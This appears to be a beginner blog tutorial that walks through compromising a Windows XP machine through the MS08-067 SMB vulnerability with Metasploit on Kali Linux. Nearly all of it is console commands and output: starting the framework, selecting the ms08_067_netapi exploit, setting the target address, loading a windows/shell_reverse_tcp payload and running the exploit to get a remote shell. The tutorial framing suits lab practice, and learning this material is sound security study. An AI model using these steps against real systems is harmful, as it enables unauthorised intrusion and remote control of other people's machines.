Get starting and go for our first attack to compromise a system. In Kali Linux Metasploit come by default, so we can start it with no matters where our <root@kali:~#pwd > pointed.
Before starting Metasploit, start the PostgreSQL database, which will be connected to Metasploit to track and what you do.
root@kali:~# service postgresql start
Now we’re all set to start Metasploit service. The command above will create a PostgreSQL user named “msf3” and also starts up the web server.
root@kali:~# service Metasploit start
Now we can enter into the console by command msfconsole
Don’t get startled if it takes time to start. It’s getting ready for you. Once it’s finished, you’ll see some ASCII code graffiti, Metasploit version, and other details.
Skipping some very basics quickly moving up to our exploit.
Finding the METASPLOIT Modules:
We will exploit the vulnerability on our victim windows XP machine patched in Microsoft Security Bulletin MS08-067.
The vulnerability from 2008 MS08-067 was an issue in the netapi32.dll that allow attackers to execute remote procedure call request via the Server Message Block (SMB) service to take over a target system. This vulnerability is expressly critical because it does not require an attacker to authenticate to the target machine.
for more details, you can visit the Metasploit online database of modules
msf > search ms08-067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
Here we will see the correct exploit name so we search for more information.
msf > info exploit/windows/smb/ms08_067_netapi Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption Module: exploit/windows/smb/ms08_067_netapi Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Great Disclosed: 2008-10-28 Provided by: hdm <firstname.lastname@example.org> Brett Moore <email@example.com> frank2 <firstname.lastname@example.org> jduck <email@example.com> Available targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal
Read through the content if want uncomplicated structure just comments below.
To use this module in Metasploit
msf > use windows/smb/ms08_067_netapi
Now obviously Metasploit need some information from you about attacker or victim because it doesn’t know magic words. use show options to see what Metasploit needs.
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST <target IP>
RPORT: Refers to the remote port. Here we can see RPORT is already set to 445, which is the default port for SMB.
SMBPIPE: This will also set be default to BROWSER, it helps us to talk some interprocess of the windows over the network.
To view target OS and versions
msf exploit(ms08_067_netapi) > show targets Exploit targets: Id Name -- ---- 0 Automatic Targeting 1 Windows 2000 Universal 2 Windows XP SP0/SP1 Universal 3 Windows 2003 SP0 Universal 4 Windows XP SP2 English (AlwaysOn NX) 5 Windows XP SP2 English (NX) 6 Windows XP SP3 English (AlwaysOn NX) 7 Windows XP SP3 English (NX) ...............
the exploit is set to 0 by default for Automatic Targeting.
Now we feel like we are set and all done, but at this point, we still did not tell our exploit what to do once the target gets exploited.
for this, we have PAYLOADS in Metasploit which we can use as per our need. to find the correct one:
msf exploit(ms08_067_netapi) > show payloads
This will give you the complete list of payloads available for specific exploit.
here we setup PAYLOAD manually
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
this is a reverse shell, exploit to send back the shell. here we need to enter the IP address of the attacker machine and the port. and again show options to set them.
and finally, Execute our exploit
msf exploit(ms08_067_netapi) > exploit
Congratulations: You have successfully exploited your first machine!
Stay stick for the further blog to know what more we can perform now after getting the session.